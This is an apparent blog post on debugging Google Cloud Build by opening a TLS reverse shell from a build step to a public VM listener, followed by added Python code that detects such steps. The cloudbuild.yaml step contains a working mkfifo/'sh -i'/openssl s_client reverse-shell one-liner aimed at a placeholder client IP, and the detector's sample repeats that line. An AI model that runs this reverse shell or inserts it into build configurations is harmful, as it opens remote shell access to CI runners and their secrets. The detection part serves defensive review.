Debug GCP CloudBuild via Reverse Shell

Motivation

When debugging an issue, it can be challenging to reproduce the problem on the machine used in the CI/CD process, especially if it differs from the local development environment. Because Cloud Build gives no direct access to the runner machine, an alternative is the reverse-shell method, which provides access to the CI/CD environment.

Note: A reverse shell should be established only for debugging and testing, and must not be misused.

  1. On the client (a VM / server that is reachable from the public internet)

$ sudo apt-get install rlwrap # readline wrapper for nice tty
$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
$ rlwrap openssl s_server -quiet -key key.pem -cert cert.pem -port 4444
  2. On the target / Cloud Build runner machine

    In cloudbuild.yaml

- id: Reverse shell
  name: ubuntu
  entrypoint: bash
  args:
    - "-c"
    - |-
      apt-get update
      apt-get install python3 openssl -y
      mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -connect <CLIENT_IP>:4444 > /tmp/s; rm /tmp/s
  3. Back to the VM / Server

### Wait until the connection has been established, then upgrade the shell to a fully interactive tty
$ python3 -c "import pty; pty.spawn('/bin/bash')"
root@49662e972571:/workspace# dmidecode -s system-product-name | grep "Google Compute Engine"
Google Compute Engine
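
For anyone reviewing build configurations, the build step shown above can be recognised statically. The following Python code is an added example, not part of the original post or gist: it flags Cloud Build steps that pair an interactive shell with an outbound `openssl s_client -connect`. The rule names, the step splitter and the sample YAML (including the host `registry.example.internal`) are constructed for illustration.

```python
import re

# Indicators taken from the build step on this page; rule names are this example's own.
RULES = {
    "named_pipe": re.compile(r"\bmkfifo\b"),
    "interactive_shell": re.compile(r"(?<![\w-])(?:ba|da|z)?sh\s+-i\b"),
    "tls_client_connect": re.compile(r"\bopenssl\s+s_client\b[^\n|;]*-connect\s+\S+"),
}
STEP_START = re.compile(r"^(\s*)-\s+(?:id|name):\s*(.*)$")

def split_steps(text):
    """Split cloudbuild.yaml text into (label, first_line_no, body) per build step."""
    steps, indent = [], None
    for no, line in enumerate(text.splitlines(), 1):
        m = STEP_START.match(line)
        # A new step starts only at the indentation of the first step seen.
        if m and (indent is None or len(m.group(1)) == indent):
            indent = len(m.group(1))
            steps.append([m.group(2).strip() or "(unnamed)", no, []])
        if steps:
            steps[-1][2].append(line)
    return [(label, no, "\n".join(body)) for label, no, body in steps]

def scan(text):
    """Flag steps that combine an interactive shell with an outbound TLS client."""
    findings = []
    for label, no, body in split_steps(text):
        hits = sorted(name for name, rx in RULES.items() if rx.search(body))
        # s_client alone is common (certificate checks); the pairing is the signal.
        if {"interactive_shell", "tls_client_connect"} <= set(hits):
            findings.append({"step": label, "line": no, "indicators": hits})
    return findings

# Constructed sample: one benign certificate check and the step from this page.
SAMPLE = """\
steps:
  - id: Check registry certificate
    name: ubuntu
    entrypoint: bash
    args: ["-c", "openssl s_client -connect registry.example.internal:443 </dev/null"]
  - id: Reverse shell
    name: ubuntu
    entrypoint: bash
    args:
      - "-c"
      - |-
        mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -connect <CLIENT_IP>:4444 > /tmp/s; rm /tmp/s
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Only the second step is reported; the certificate check uses `s_client` without an interactive shell and is left alone.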

Original content: https://gist.github.com/muhammad-asn/867f6224fe60edba627945326fad8ecb

Written by

Muhammad Ardivan Satrio Nugroho